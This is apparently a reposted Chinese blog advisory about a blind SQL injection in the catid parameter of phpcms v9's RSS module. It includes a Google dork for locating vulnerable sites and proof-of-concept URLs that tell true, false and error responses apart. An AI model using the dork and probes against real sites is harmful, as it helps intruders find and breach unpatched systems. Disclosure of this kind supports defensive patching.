phpcms V9 BLind SQL 注入漏洞0day


本文整理自网络,侵删。

  影响版本:phpcms v9 blind

  官方网站:http://www.phpcms.cn

  漏洞类型:SQL注入

  漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

  google dork:inurl:"index.php?m=content+c=rss+catid=10"

  exploit & p0c

  [!] index.php?m=content&c=rss&catid=[valid catid]

  Example p0c

  [!] http://host/index.php?m=content&c=rss&catid=10 <= True

  [!] http://host/index.php?m=content&c=rss&catid=-10 <= False

  [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

 

更多PHPCMS内容来自木庄网络博客


标签:PHPCMS

相关阅读 >>

phpcms小技巧:巧用碎片功能

phpcms v9自定义评论字段utf8_cmsyou修正版

phpcms v9引用images文件夹中的图片的方法

关于cms的选择几点建议

phpcms v9使用get调用指定id文章内容、页面数据方法(get标签什么方法)

phpcms v9静态化html生成设置及url规则优化

phpcms 2008 整合ucenter的图文方法

phpcms添加栏目图文教程

phpcms 栏目页及列表页分页修改

phpcms v9 彻底去除自带的水印功能的方法

更多相关阅读请进入《phpcms》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...